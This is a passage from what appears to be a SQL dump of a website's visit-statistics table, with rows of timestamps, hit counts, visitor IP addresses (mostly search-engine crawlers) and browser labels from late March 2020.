57.55.39.22','other'),(492088,1585229423,1,1,0,0,'54.36.149.97','other'),(492089,1585230251,1,1,0,0,'178.154.200.222','other'),(492090,1585230750,1,1,0,0,'194.44.228.210','firefox'),(492091,1585231364,1,1,0,0,'8.29.198.26','other'),(492092,1585231776,1,1,0,0,'66.249.64.25','chrome'),(492093,1585231967,1,1,0,0,'66.249.64.24','chrome'),(492094,1585232107,1,1,0,0,'8.29.198.25','other'),(492095,1585232127,1,1,0,0,'36.63.89.127','chrome'),(492096,1585232461,1,1,0,0,'54.36.149.38','other'),(492097,1585232550,1,1,0,0,'66.249.64.23','chrome'),(492098,1585232586,1,1,0,0,'54.36.149.81','other'),(492099,1585232588,1,1,0,0,'207.46.13.150','other'),(492100,1585232648,1,1,0,0,'91.196.178.88','chrome'),(492101,1585233012,1,1,0,0,'131.220.6.152','chrome'),(492102,1585233037,1,1,0,0,'59.41.157.77','chrome'),(492103,1585233496,1,1,0,0,'66.249.64.24','chrome'),(492104,1585233800,1,1,0,0,'207.46.13.150','other'),(492105,1585234729,2,2,0,0,'66.249.64.23','chrome'),(492106,1585235997,1,1,0,0,'66.249.64.23','chrome'),(492107,1585236233,1,1,0,0,'207.46.13.150','other'),(492108,1585236273,3,3,0,0,'66.249.64.24','chrome'),(492109,1585236607,1,1,0,0,'91.196.178.186','chrome'),(492110,1585237762,2,1,1,0,'66.249.64.24',''),(492111,1585238100,1,1,0,0,'66.249.64.25','chrome'),(492112,1585238157,2,2,0,0,'66.249.64.23','chrome'),(492113,1585238452,2,2,0,0,'66.249.64.24','chrome'),(492114,1585238600,1,1,0,0,'66.249.70.33','chrome'),(492115,1585238669,1,1,0,0,'178.154.200.222','other'),(492116,1585239594,1,1,0,0,'66.249.64.25','chrome'),(492117,1585239800,1,1,0,0,'66.249.64.23','chrome'),(492118,1585239919,1,1,0,0,'178.154.200.222','other'),(492119,1585240018,1,1,0,0,'207.46.13.150','other'),(492120,1585240363,1,1,0,0,'54.36.149.75','other'),(492121,1585240588,1,1,0,0,'54.36.149.61','other'),(492122,1585240732,1,1,0,0,'157.55.39.22','other'),(492123,1585240819,1,1,0,0,'66.249.64.24','chrome'),(492124,1585240950,1,1,0,0,'91.196.178.186','chrome'),(492125,1585241143,2,2,0,0,'157.55.39.81','other'),(492126,1585241214,1,1,0,0,'34.204.188.53','other'),(492127,1585241275,1,1,0,0,'201.249.163.114','other'),(492128,1585241669,1,1,0,0,'66.249.64.23','chrome'),(492129,1585241786,1,1,0,0,'207.46.13.150','other'),(492130,1585241811,5,5,0,0,'66.249.64.25','chrome'),(492131,1585242194,1,1,0,0,'8.29.198.25','other'),(492132,1585242279,1,1,0,0,'114.139.255.221','chrome'),(492133,1585242366,1,1,0,0,'54.36.149.19','other'),(492134,1585242543,1,1,0,0,'60.187.51.73','chrome'),(492135,1585242583,1,1,0,0,'66.249.64.23','chrome'),(492136,1585242646,1,1,0,0,'66.249.64.24','chrome'),(492137,1585242939,1,1,0,0,'8.29.198.26','other'),(492138,1585243057,1,1,0,0,'91.196.178.14','chrome'),(492139,1585243484,1,0,1,0,'157.55.39.22',''),(492140,1585243532,2,2,0,0,'66.249.64.23','chrome'),(492141,1585244230,1,1,0,0,'54.36.149.91','other'),(492142,1585245509,2,2,0,0,'178.154.200.222','other'),(492143,1585245769,1,1,0,0,'223.198.245.173','chrome'),(492144,1585245802,1,1,0,0,'42.236.254.89','chrome'),(492145,1585245872,1,1,0,0,'88.155.121.32','chrome'),(492146,1585245906,1,1,0,0,'119.177.52.188','chrome'),(492147,1585245912,1,1,0,0,'173.252.111.18','other'),(492148,1585246124,1,1,0,0,'54.36.149.33','other'),(492149,1585246336,5,5,0,0,'66.249.64.23','chrome'),(492150,1585246465,1,0,1,0,'66.249.64.24',''),(492151,1585246716,2,2,0,0,'207.46.13.150','other'),(492152,1585246738,1,1,0,0,'94.179.247.176','chrome'),(492153,1585246807,1,1,0,0,'120.9.214.179','chrome'),(492154,1585246846,2,2,0,0,'66.249.64.24','chrome'),(492155,1585246917,2,2,0,0,'66.249.64.25','chrome'),(492156,1585247328,1,1,0,0,'213.180.203.140','other'),(492157,1585247424,1,1,0,0,'207.46.13.101','other'),(492158,1585247432,1,1,0,0,'54.36.149.72','other'),(492159,1585247790,2,2,0,0,'157.55.39.22','other'),(492160,1585247892,1,1,0,0,'178.154.200.222','other'),(492161,1585247924,1,1,0,0,'54.36.149.55','other'),(492162,1585248070,1,1,0,0,'54.36.149.30','other'),(492163,1585248404,1,1,0,0,'223.91.208.250','chrome'),(492164,1585248409,1,1,0,0,'113.137.103.168','chrome'),(492165,1585248411,1,1,0,0,'220.186.164.228','chrome'),(492166,1585248741,1,1,0,0,'91.196.178.177','chrome'),(492167,1585248786,4,4,0,0,'66.249.64.25','chrome'),(492168,1585248864,2,2,0,0,'66.249.64.24','chrome'),(492169,1585249441,1,1,0,0,'178.154.200.222','other'),(492170,1585249445,1,1,0,0,'114.99.12.88','chrome'),(492171,1585249952,1,1,0,0,'54.36.149.57','other'),(492172,1585250004,1,1,0,0,'54.36.149.68','other'),(492173,1585250393,1,1,0,0,'178.154.200.222','other'),(492174,1585250560,2,2,0,0,'66.249.64.25','chrome'),(492175,1585250724,1,1,0,0,'207.46.13.101','other'),(492176,1585250791,1,0,1,0,'157.55.39.22',''),(492177,1585250842,1,1,0,0,'221.221.243.95','chrome'),(492178,1585250852,1,1,0,0,'27.190.137.236','chrome'),(492179,1585250922,1,1,0,0,'91.196.178.132','chrome'),(492180,1585251209,2,2,0,0,'66.249.64.24','chrome'),(492181,1585251388,1,1,0,0,'54.36.149.86','other'),(492182,1585251472,1,1,0,0,'175.173.222.51','chrome'),(492183,1585251584,1,1,0,0,'66.249.64.23','chrome'),(492184,1585251669,1,1,0,0,'66.249.64.25','chrome'),(492185,1585252271,2,1,1,0,'66.249.64.24',''),(492186,1585252354,1,1,0,0,'173.252.111.20','other'),(492187,1585252355,1,1,0,0,'173.252.111.10','other'),(492188,1585252621,1,0,1,0,'157.55.39.22',''),(492189,1585252774,2,2,0,0,'66.249.64.25','chrome'),(492190,1585253029,1,1,0,0,'8.29.198.26','other'),(492191,1585253115,2,2,0,0,'66.249.64.24','chrome'),(492192,1585253464,1,1,0,0,'207.46.13.101','other'),(492193,1585253772,1,1,0,0,'8.29.198.25','other'),(492194,1585253907,1,1,0,0,'66.249.64.25','chrome'),(492195,1585254304,1,1,0,0,'66.249.64.23','chrome'),(492196,1585254508,1,1,0,0,'207.46.13.150','other'),(492197,1585254736,1,1,0,0,'66.249.70.36','chrome'),(492198,1585254927,1,1,0,0,'66.249.64.24','chrome'),(492199,1585254962,1,1,0,0,'66.249.64.25','chrome'),(492200,1585255057,1,1,0,0,'17.58.101.25','other'),(492201,1585255295,1,1,0,0,'207.46.13.101','other'),(492202,1585255387,1,1,0,0,'66.249.70.38','chrome'),(492203,1585255476,1,0,1,0,'157.55.39.22',''),(492204,1585255555,1,1,0,0,'46.211.59.40','chrome'),(492205,1585256129,1,1,0,0,'54.36.149.24','other'),(492206,1585256131,3,3,0,0,'66.249.64.23','chrome'),(492207,1585256881,2,2,0,0,'66.249.64.24','chrome'),(492208,1585256959,1,1,0,0,'66.249.70.36','chrome'),(492209,1585257122,6,6,0,0,'66.249.64.23','chrome'),(492210,1585257398,1,1,0,0,'66.249.64.25','chrome'),(492211,1585257454,1,1,0,0,'54.36.149.64','other'),(492212,1585257627,1,1,0,0,'213.180.203.16','other'),(492213,1585257805,1,1,0,0,'171.104.220.96','chrome'),(492214,1585257852,1,1,0,0,'54.36.149.66','other'),(492215,1585257986,1,1,0,0,'51.68.152.26','chrome'),(492216,1585258018,1,1,0,0,'54.36.149.77','other'),(492217,1585258077,1,1,0,0,'207.46.13.101','other'),(492218,1585258205,1,1,0,0,'185.208.211.211','firefox'),(492219,1585258432,1,1,0,0,'66.249.70.36','chrome'),(492220,1585258602,1,1,0,0,'66.249.64.23','chrome'),(492221,1585258758,2,2,0,0,'66.249.64.24','chrome'),(492222,1585258970,1,1,0,0,'66.249.70.38','chrome'),(492223,1585259218,1,1,0,0,'207.46.13.101','other'),(492224,1585259343,1,1,0,0,'178.154.200.222','other'),(492225,1585259535,1,1,0,0,'54.36.149.77','other'),(492226,1585259537,1,1,0,0,'66.249.64.23','chrome'),(492227,1585259637,1,1,0,0,'207.46.13.150','other'),(492228,1585259902,1,1,0,0,'54.36.149.24','other'),(492229,1585260175,1,1,0,0,'66.249.64.25','chrome'),(492230,1585260441,1,1,0,0,'91.196.178.177','chrome'),(492231,1585260649,3,3,0,0,'66.249.64.23','chrome'),(492232,1585261106,1,1,0,0,'14.106.106.254','chrome'),(492233,1585261123,1,1,0,0,'125.73.192.196','chrome'),(492234,1585261521,1,1,0,0,'116.22.204.101','chrome'),(492235,1585261809,1,1,0,0,'54.36.149.107','other'),(492236,1585262072,2,2,0,0,'66.249.64.25','chrome'),(492237,1585262282,2,2,0,0,'178.154.200.222','other'),(492238,1585262427,2,2,0,0,'66.249.64.24','chrome'),(492239,1585262936,1,1,0,0,'54.36.149.12','other'),(492240,1585263121,1,1,0,0,'173.252.111.2','other'),(492241,1585263185,2,2,0,0,'207.46.13.101','other'),(492242,1585263187,1,1,0,0,'173.252.111.12','other'),(492244,1585263350,1,1,0,0,'54.36.149.28','other'),(492245,1585263363,1,1,0,0,'66.249.64.25','chrome'),(492246,1585263532,1,1,0,0,'54.36.149.82','other'),(492247,1585263861,1,1,0,0,'8.29.198.25','other'),(492248,1585263938,1,1,0,0,'178.154.200.216','other'),(492249,1585263942,1,1,0,0,'66.249.70.38','chrome'),(492250,1585264550,1,1,0,0,'178.154.200.222','other'),(492251,1585264600,1,1,0,0,'66.249.70.33','chrome'),(492252,1585264605,1,1,0,0,'8.29.198.26','other'),(492253,1585264629,2,2,0,0,'66.249.70.36','chrome'),(492254,1585264709,1,1,0,0,'66.249.64.24','chrome'),(492255,1585264830,1,1,0,0,'207.46.13.150','other'),(492256,1585264933,1,1,0,0,'66.249.64.23','chrome'),(492257,1585265088,1,1,0,0,'54.36.149.70','other'),(492258,1585265642,1,1,0,0,'157.55.39.22','other'),(492259,1585266128,2,2,0,0,'66.249.64.25','chrome'),(492260,1585266302,1,1,0,0,'54.36.149.33','other'),(492261,1585266732,3,3,0,0,'66.249.64.23','chrome'),(492262,1585266739,2,2,0,0,'66.249.70.38','chrome'),(492263,1585266789,2,1,1,0,'66.249.64.24',''),(492264,1585266824,1,1,0,0,'66.249.70.33','chrome'),(492265,1585266889,8,8,0,0,'77.120.98.235','other'),(492266,1585267192,2,2,0,0,'66.249.64.25','chrome'),(492267,1585268510,1,1,0,0,'66.249.70.36','chrome'),(492268,1585268522,1,1,0,0,'17.58.101.25','other'),(492269,1585268829,1,1,0,0,'207.46.13.101','other'),(492270,1585269416,2,2,0,0,'66.249.64.25','chrome'),(492271,1585269537,1,1,0,0,'66.249.64.23','chrome'),(492272,1585269612,1,1,0,0,'182.244.168.128','chrome'),(492273,1585269624,1,1,0,0,'182.247.61.98','chrome'),(492274,1585269861,1,1,0,0,'207.46.13.150','other'),(492275,1585270507,1,1,0,0,'62.205.134.182','other'),(492276,1585270508,1,1,0,0,'66.249.64.24','chrome'),(492277,1585270854,2,2,0,0,'66.249.64.23','chrome'),(492278,1585271418,1,1,0,0,'157.55.39.22','other'),(492279,1585271789,1,1,0,0,'66.249.64.23','chrome'),(492280,1585272114,3,3,0,0,'66.249.64.24','chrome'),(492281,1585272631,1,1,0,0,'66.249.64.25','chrome'),(492282,1585272859,1,1,0,0,'116.55.141.50','chrome'),(492283,1585273290,1,1,0,0,'66.249.64.24','chrome'),(492284,1585273369,1,1,0,0,'54.36.149.18','other'),(492285,1585273460,1,1,0,0,'54.36.149.48','other'),(492286,1585274070,1,1,0,0,'207.46.13.101','other'),(492287,1585274119,1,1,0,0,'66.249.64.25','chrome'),(492288,1585274695,1,1,0,0,'8.29.198.25','other'),(492289,1585274820,1,1,0,0,'66.249.70.33','chrome'),(492290,1585275005,1,1,0,0,'66.249.64.24','chrome'),(492291,1585275195,1,1,0,0,'66.249.64.23','chrome'),(492292,1585275402,1,1,0,0,'209.17.96.162','other'),(492293,1585275445,1,1,0,0,'8.29.198.26','other'),(492294,1585276251,2,2,0,0,'66.249.64.25','chrome'),(492295,1585276683,1,1,0,0,'66.249.70.38','chrome'),(492296,1585276765,1,1,0,0,'66.249.70.36','chrome'),(492297,1585277603,2,2,0,0,'66.249.64.25','chrome'),(492298,1585277823,1,1,0,0,'66.249.64.23','chrome'),(492299,1585277900,1,1,0,0,'66.249.70.33','chrome'),(492300,1585278361,1,1,0,0,'54.36.149.8','other'),(492301,1585278453,3,3,0,0,'66.249.64.24','chrome'),(492302,1585279023,1,1,0,0,'178.154.200.222','other'),(492303,1585279140,2,2,0,0,'66.249.64.25','chrome'),(492304,1585279444,1,1,0,0,'66.249.64.23','chrome'),(492305,1585279585,1,1,0,0,'207.46.13.150','other'),(492306,1585279898,3,3,0,0,'66.249.64.24','chrome'),(492307,1585280110,1,1,0,0,'66.249.64.25','chrome'),(492308,1585280414,2,2,0,0,'66.249.64.23','chrome'),(492309,1585280602,2,2,0,0,'91.196.178.178','chrome'),(492310,1585280704,1,1,0,0,'54.36.149.28','other'),(492311,1585280832,1,1,0,0,'54.36.149.0','other'),(492312,1585281722,1,1,0,0,'178.154.200.222','other'),(492313,1585282107,2,2,0,0,'66.249.64.25','chrome'),(492314,1585282624,1,1,0,0,'66.249.64.24','chrome'),(492315,1585282671,1,1,0,0,'157.55.39.22','other'),(492316,1585283042,2,2,0,0,'66.249.64.23','chrome'),(492317,1585284128,1,1,0,0,'66.249.64.25','chrome'),(492318,1585284742,2,2,0,0,'66.249.70.36','chrome'),(492319,1585285400,1,1,0,0,'54.36.149.67','other'),(492320,1585285441,1,1,0,0,'116.248.187.171','chrome'),(492321,1585285530,1,1,0,0,'8.29.198.27','other'),(492322,1585285588,1,1,0,0,'87.250.224.84','other'),(492323,1585285674,1,1,0,0,'54.36.149.36','other'),(492324,1585285705,1,1,0,0,'66.249.64.23','chrome'),(492325,1585286158,2,2,0,0,'66.249.64.24','chrome'),(492326,1585286281,1,1,0,0,'8.29.198.25','other'),(492327,1585286505,1,1,0,0,'66.249.70.33','chrome'),(492328,1585286616,1,1,0,0,'27.41.158.55','chrome'),(492329,1585286989,1,1,0,0,'207.46.13.150','other'),(492330,1585287553,1,1,0,0,'66.249.64.24','chrome'),(492331,1585287587,1,1,0,0,'62.205.134.182','other'),(492332,1585288009,1,1,0,0,'54.36.149.62','other'),(492333,1585288061,8,8,0,0,'77.120.98.235','other'),(492334,1585288393,1,1,0,0,'114.99.177.156','chrome'),(492335,1585288394,1,1,0,0,'117.68.193.234','chrome'),(492336,1585288402,1,1,0,0,'116.248.186.173','chrome'),(492337,1585288422,1,1,0,0,'175.42.73.134','chrome'),(492338,1585288431,2,2,0,0,'66.249.64.23','chrome'),(492339,1585288608,1,1,0,0,'54.36.149.5','other'),(492340,1585288843,1,1,0,0,'66.249.64.24','chrome'),(492341,1585289175,1,1,0,0,'66.249.70.36','chrome'),(492342,1585289600,2,2,0,0,'66.249.64.23','chrome'),(492343,1585289602,1,1,0,0,'178.154.200.222','other'),(492344,1585289954,1,1,0,0,'54.36.149.30','other'),(492345,1585290610,1,1,0,0,'207.46.13.101','other'),(492346,1585290640,1,1,0,0,'91.196.179.25','chrome'),(492347,1585291227,1,1,0,0,'31.13.127.14','other'),(492348,1585291238,1,1,0,0,'54.36.149.51','other'),(492349,1585291467,1,1,0,0,'91.196.178.182','firefox'),(492350,1585291663,1,1,0,0,'213.180.203.16','other'),(492351,1585291808,1,1,0,0,'178.154.200.222','other'),(492352,1585292248,1,1,0,0,'66.249.70.36','chrome'),(492353,1585292312,1,1,0,0,'91.196.178.1','chrome'),(492354,1585292560,1,1,0,0,'66.249.70.33','chrome'),(492355,1585292929,1,1,0,0,'66.249.64.23','chrome'),(492356,1585293629,1,1,0,0,'66.249.64.25','chrome'),(492357,1585293777,1,1,0,0,'157.55.39.22','other'),(492358,1585293811,1,1,0,0,'207.46.13.150','other'),(492359,1585293816,2,2,0,0,'207.46.13.101','other'),(492360,1585293856,1,1,0,0,'66.249.70.36','chrome'),(492361,1585294353,1,1,0,0,'178.154.200.222','other'),(492362,1585294656,1,1,0,0,'66.249.64.25','chrome'),(492363,1585294933,5,5,0,0,'66.249.64.24','chrome'),(492364,1585294958,2,2,0,0,'195.10.210.70','chrome'),(492365,1585295329,3,3,0,0,'66.249.64.23','chrome'),(492366,1585295660,1,1,0,0,'213.180.203.16','other'),(492367,1585295806,1,1,0,0,'54.36.149.30','other'),(492368,1585296299,1,1,0,0,'66.249.64.24','chrome'),(492369,1585296357,1,1,0,0,'8.29.198.26','other'),(492370,1585296772,1,1,0,0,'91.196.178.140','chrome'),(492371,1585296871,2,2,0,0,'66.249.64.25','chrome'),(492372,1585296931,1,1,0,0,'157.55.39.22','other'),(492373,1585297113,1,1,0,0,'8.29.198.25','other'),(492374,1585297163,5,5,0,0,'66.249.64.23','chrome'),(492375,1585297961,1,1,0,0,'54.36.149.94','other'),(492376,1585298155,1,1,0,0,'66.249.64.25','chrome'),(492377,1585298171,1,1,0,0,'94.180.129.53','chrome'),(492378,1585298283,2,2,0,0,'178.154.200.222','other'),(492379,1585298637,1,1,0,0,'66.249.64.24','chrome'),(492380,1585299349,1,1,0,0,'178.154.200.222','other'),(492381,1585299621,2,2,0,0,'66.249.64.23','chrome'),(492382,1585299883,1,1,0,0,'66.249.64.25','chrome'),(492383,1585300535,1,1,0,0,'91.196.178.140','chrome'),(492384,1585300851,1,1,0,0,'178.154.200.220','other'),(492385,1585300988,1,1,0,0,'66.249.64.23','chrome'),(492386,1585301089,1,1,0,0,'223.215.174.14','chrome'),(492387,1585301124,1,1,0,0,'182.247.61.22','chrome'),(492388,1585301330,1,1,0,0,'123.179.130.138','chrome'),(492389,1585301395,1,1,0,0,'66.249.64.24','chrome'),(492390,1585301424,1,1,0,0,'91.196.178.183','chrome'),(492391,1585301433,1,1,0,0,'91.196.178.154','firefox'),(492392,1585301722,3,3,0,0,'178.154.200.222','other'),(492393,1585301873,1,1,0,0,'66.249.64.25','chrome'),(492394,1585302354,2,2,0,0,'207.46.13.243','other'),(492395,1585302385,1,1,0,0,'18.224.39.95','chrome'),(492396,1585302870,1,1,0,0,'213.180.203.16','other'),(492397,1585302897,1,1,0,0,'54.36.149.60','other'),(492398,1585302999,2,2,0,0,'66.249.64.25','chrome'),(492399,1585303197,1,1,0,0,'66.249.64.24','chrome'),(492400,1585303277,2,2,0,0,'207.46.13.150','other'),(492401,1585303434,1,1,0,0,'207.46.13.243','other'),(492402,1585303437,1,0,1,0,'66.249.64.23',''),(492403,1585303835,2,2,0,0,'66.249.64.23','chrome'),(492404,1585303899,1,1,0,0,'213.180.203.16','other'),(492405,1585304266,4,4,0,0,'66.249.64.25','chrome'),(492406,1585304286,1,1,0,0,'54.36.149.89','other'),(492407,1585304311,1,1,0,0,'92.112.125.200','chrome'),(492408,1585304373,1,1,0,0,'66.249.64.24','chrome'),(492409,1585304664,2,2,0,0,'66.249.70.33','chrome'),(492410,1585305129,1,1,0,0,'178.154.200.222','other'),(492411,1585305223,1,1,0,0,'66.249.64.25','chrome'),(492412,1585305538,1,1,0,0,'207.46.13.243','other'),(492413,1585306472,1,1,0,0,'94.244.151.238','chrome'),(492414,1585306740,1,1,0,0,'207.46.13.150','other'),(492415,1585306757,1,1,0,0,'207.46.13.243','other'),(492416,1585306789,4,4,0,0,'66.249.64.24','chrome'),(492417,1585306847,1,1,0,0,'115.204.240.104','chrome'),(492418,1585306894,1,1,0,0,'157.55.39.22','other'),(492419,1585307068,1,1,0,0,'124.112.205.128','chrome'),(492420,1585307180,1,1,0,0,'8.29.198.27','other'),(492421,1585307305,1,1,0,0,'66.249.64.23','chrome'),(492422,1585307319,1,1,0,0,'66.249.70.36','chrome'),(492423,1585307585,1,1,0,0,'91.196.178.174','chrome'),(492424,1585307709,3,3,0,0,'66.249.64.25','chrome'),(492425,1585307757,1,1,0,0,'91.124.137.89','chrome'),(492426,1585307946,1,1,0,0,'8.29.198.25','other'),(492427,1585307986,2,2,0,0,'207.46.13.150','other'),(492428,1585307992,1,1,0,0,'157.55.39.22','other'),(492429,1585308254,6,5,1,0,'66.249.64.23',''),(492430,1585308360,1,1,0,0,'66.249.70.33','chrome'),(492431,1585308771,2,2,0,0,'94.153.65.112','chrome'),(492432,1585309047,1,1,0,0,'66.249.70.36','chrome'),(492433,1585309411,1,1,0,0,'54.36.149.45','other'),(492434,1585309543,1,1,0,0,'66.249.64.24','chrome'),(492435,1585309730,1,1,0,0,'51.77.246.201','other'),(492436,1585309849,2,2,0,0,'207.46.13.150','other'),(492437,1585310008,1,1,0,0,'66.249.64.25','chrome'),(492438,1585310105,1,1,0,0,'91.196.178.171','chrome'),(492439,1585310277,1,1,0,0,'91.196.177.46','chrome'),(492440,1585310350,1,0,1,0,'207.46.13.243',''),(492441,1585310739,8,8,0,0,'77.120.98.235','other'),(492442,1585310775,1,1,0,0,'66.249.70.36','chrome'),(492443,1585310792,1,1,0,0,'207.46.13.243','other'),(492444,1585310930,1,1,0,0,'91.196.178.27','chrome'),(492445,1585310963,1,1,0,0,'66.249.70.38','chrome'),(492446,1585311076,1,1,0,0,'66.249.64.23','chrome'),(492447,1585311249,1,1,0,0,'91.196.178.72','chrome'),(492448,1585311403,2,2,0,0,'66.249.64.24','chrome'),(492449,1585311686,1,1,0,0,'66.249.64.25','chrome'),(492450,1585311715,1,1,0,0,'109.74.154.72','chrome'),(492451,1585311857,1,1,0,0,'207.46.13.150','other'),(492452,1585312083,1,1,0,0,'66.249.70.38','chrome'),(492453,1585312431,1,1,0,0,'207.46.13.243','other'),(492454,1585312802,1,1,0,0,'91.196.178.163','firefox'),(492455,1585313237,2,2,0,0,'66.249.70.38','chrome'),(492456,1585313842,1,1,0,0,'37.73.169.211','chrome'),(492457,1585314172,1,1,0,0,'66.249.64.25','chrome'),(492458,1585314256,2,2,0,0,'85.214.173.241','other'),(492459,1585314391,1,1,0,0,'66.249.70.33','chrome'),(492460,1585314543,1,1,0,0,'125.107.9.206','chrome'),(492461,1585314852,1,1,0,0,'213.180.203.16','other'),(492462,1585315473,2,2,0,0,'207.46.13.150','other'),(492463,1585315482,1,1,0,0,'66.249.64.24','chrome'),(492464,1585315510,1,1,0,0,'66.249.70.33','chrome'),(492465,1585316008,1,1,0,0,'54.36.149.44','other'),(492466,1585316318,1,1,0,0,'176.124.133.100','chrome'),(492467,1585316632,1,1,0,0,'66.249.64.24','chrome'),(492468,1585317462,1,1,0,0,'207.46.13.150','other'),(492469,1585317532,2,2,0,0,'66.249.64.25','chrome'),(492470,1585317553,1,1,0,0,'66.249.64.24','chrome'),(492471,1585317568,1,1,0,0,'157.55.39.22','other'),(492472,1585318011,1,1,0,0,'8.29.198.25','other'),(492473,1585318226,1,1,0,0,'66.249.70.38','chrome'),(492474,1585318332,1,1,0,0,'66.249.64.23','chrome'),(492475,1585318707,2,2,0,0,'66.249.64.24','chrome'),(492476,1585318780,1,1,0,0,'8.29.198.27','other'),(492477,1585319232,1,1,0,0,'131.220.6.152','chrome'),(492478,1585319458,2,2,0,0,'66.249.70.36','chrome'),(492479,1585319619,1,1,0,0,'207.46.13.243','other'),(492480,1585319858,1,1,0,0,'178.154.200.222','other'),(492481,1585320402,1,1,0,0,'106.59.35.106','chrome'),(492482,1585320536,1,1,0,0,'185.244.214.114','chrome'),(492483,1585320802,1,1,0,0,'54.36.149.47','other'),(492484,1585320910,1,1,0,0,'66.249.70.36','chrome'),(492485,1585320912,1,1,0,0,'207.46.13.150','other'),(492486,1585321172,2,2,0,0,'66.249.64.24','chrome'),(492487,1585321363,1,1,0,0,'66.249.64.25','chrome'),(492488,1585321369,2,2,0,0,'188.163.16.101','chrome'),(492489,1585321683,1,1,0,0,'2.47.39.220','other'),(492490,1585321745,1,1,0,0,'66.249.64.23','chrome'),(492491,1585322048,1,1,0,0,'207.46.13.243','other'),(492492,1585322142,1,1,0,0,'54.36.149.19','other'),(492493,1585322822,2,2,0,0,'66.249.64.25','chrome'),(492494,1585323757,1,1,0,0,'66.249.64.23','chrome'),(492495,1585324880,1,1,0,0,'54.36.149.44','other'),(492496,1585326710,2,2,0,0,'66.249.64.25','chrome'),(492497,1585326916,1,0,1,0,'157.55.39.22',''),(492498,1585327083,1,1,0,0,'54.36.149.91','other'),(492499,1585327367,1,1,0,0,'54.36.149.104','other'),(492500,1585327489,3,3,0,0,'34.66.64.45','other'),(492501,1585327743,2,2,0,0,'157.55.39.22','other'),(492502,1585328105,2,2,0,0,'66.249.64.25','chrome'),(492503,1585328307,1,1,0,0,'54.36.149.63','other'),(492504,1585328352,1,1,0,0,'125.123.141.107','chrome'),(492505,1585328370,1,1,0,0,'60.185.69.60','chrome'),(492506,1585328554,1,1,0,0,'207.46.13.150','other'),(492507,1585328639,1,1,0,0,'54.36.149.68','other'),(492508,1585328813,1,1,0,0,'66.249.64.23','chrome'),(492509,1585328828,1,1,0,0,'117.88.107.143','chrome'),(492510,1585328831,1,1,0,0,'36.57.118.68','chrome'),(492511,1585328838,1,1,0,0,'218.64.152.90','chrome'),(492512,1585328839,1,1,0,0,'36.56.147.41','chrome'),(492513,1585328841,1,1,0,0,'8.29.198.26','other'),(492515,1585329131,2,2,0,0,'207.46.13.243','other'),(492516,1585329196,2,2,0,0,'66.249.70.38','chrome'),(492517,1585329610,1,1,0,0,'8.29.198.27','other'),(492518,1585330194,1,1,0,0,'66.249.64.25','chrome'),(492519,1585330414,2,2,0,0,'66.249.64.23','chrome'),(492520,1585331045,1,1,0,0,'207.46.13.243','other'),(492521,1585331123,1,1,0,0,'91.196.178.66','firefox'),(492522,1585331914,1,1,0,0,'54.36.149.70','other'),(492523,1585331979,1,1,0,0,'66.249.70.33','chrome'),(492524,1585332279,1,1,0,0,'54.36.149.102','other'),(492525,1585332406,1,1,0,0,'54.36.149.36','other'),(492526,1585332523,2,2,0,0,'207.46.13.243','other'),(492527,1585332765,1,1,0,0,'66.249.64.24','chrome'),(492528,1585332853,8,8,0,0,'77.120.98.235','other'),(492529,1585333069,1,1,0,0,'157.55.39.22','other'),(492530,1585333311,1,1,0,0,'49.87.79.19','chrome'),(492531,1585333467,1,1,0,0,'54.36.149.34','other'),(492532,1585333547,1,1,0,0,'54.36.149.38','other'),(492533,1585333594,1,1,0,0,'49.86.180.212','chrome'),(492534,1585333948,1,1,0,0,'66.249.64.25','chrome'),(492535,1585334088,1,1,0,0,'207.46.13.150','other'),(492536,1585334444,1,1,0,0,'54.36.149.58','other'),(492537,1585334580,1,1,0,0,'66.249.64.23','chrome'),(492538,1585334967,2,2,0,0,'157.55.39.22','other'),(492539,1585335042,1,1,0,0,'88.155.160.86','chrome'),(492540,1585335385,21,21,0,0,'82.165.203.254','firefox'),(492541,1585335415,1,1,0,0,'81.209.177.145','other'),(492542,1585335856,1,1,0,0,'207.46.13.150','other'),(492543,1585336335,1,1,0,0,'66.249.64.25','chrome'),(492544,1585336391,1,1,0,0,'66.249.64.24','chrome'),(492545,1585337191,1,1,0,0,'66.249.70.33','chrome'),(492546,1585337259,1,1,0,0,'157.55.39.22','other'),(492547,1585337460,3,3,0,0,'66.249.64.24','chrome'),(492548,1585337545,1,1,0,0,'66.249.64.23','chrome'),(492549,1585337654,1,1,0,0,'207.46.13.150','other'),(492550,1585338522,1,1,0,0,'66.249.64.23','chrome'),(492551,1585339669,2,2,0,0,'8.29.198.27','other'),(492552,1585339670,1,1,0,0,'66.249.64.24','chrome'),(492553,1585340499,2,2,0,0,'66.249.70.36','chrome'),(492554,1585340811,3,3,0,0,'66.249.64.25','chrome'),(492555,1585341016,2,2,0,0,'66.249.64.24','chrome'),(492556,1585341067,1,1,0,0,'157.55.39.22','other'),(492557,1585342617,2,2,0,0,'66.249.64.23','chrome'),(492558,1585342864,1,1,0,0,'66.249.70.36','chrome'),(492559,1585343226,4,3,1,0,'66.249.64.24',''),(492560,1585343271,1,1,0,0,'157.55.39.22','other'),(492561,1585344706,2,2,0,0,'66.249.64.25','chrome'),(492562,1585345662,1,1,0,0,'54.36.149.11','other'),(492563,1585345824,4,4,0,0,'66.249.64.25','chrome'),(492564,1585346154,1,1,0,0,'157.55.39.22','other'),(492565,1585346490,3,3,0,0,'66.249.64.24','chrome'),(492566,1585348074,1,1,0,0,'157.55.39.22','other'),(492567,1585348167,1,1,0,0,'207.46.13.243','other'),(492568,1585348199,2,2,0,0,'207.46.13.136','other'),(492569,1585348636,1,1,0,0,'54.36.149.18','other'),(492570,1585348940,2,2,0,0,'66.249.64.23','chrome'),(492571,1585349139,1,1,0,0,'54.36.149.106','other'),(492572,1585349450,4,4,0,0,'66.249.64.24','chrome'),(492573,1585349526,1,1,0,0,'178.154.200.222','other'),(492574,1585349535,1,1,0,0,'66.249.64.25','chrome'),(492575,1585349570,3,3,0,0,'207.46.13.136','other'),(492576,1585350491,1,1,0,0,'8.29.198.25','other'),(492577,1585350768,1,1,0,0,'117.64.149.238','chrome'),(492578,1585350824,1,1,0,0,'66.249.64.24','chrome'),(492579,1585350831,4,4,0,0,'66.249.70.33','chrome'),(492580,1585350895,2,2,0,0,'66.249.64.23','chrome'),(492581,1585350909,2,1,1,0,'66.249.64.25',''),(492582,1585351214,1,0,1,0,'207.46.13.136',''),(492583,1585351260,1,1,0,0,'8.29.198.26','other'),(492584,1585351318,1,1,0,0,'178.154.200.222','other'),(492585,1585351483,2,2,0,0,'66.249.70.38','chrome'),(492586,1585351499,1,1,0,0,'207.46.13.136','other'),(492587,1585351595,2,2,0,0,'54.36.149.0','other'),(492588,1585351716,2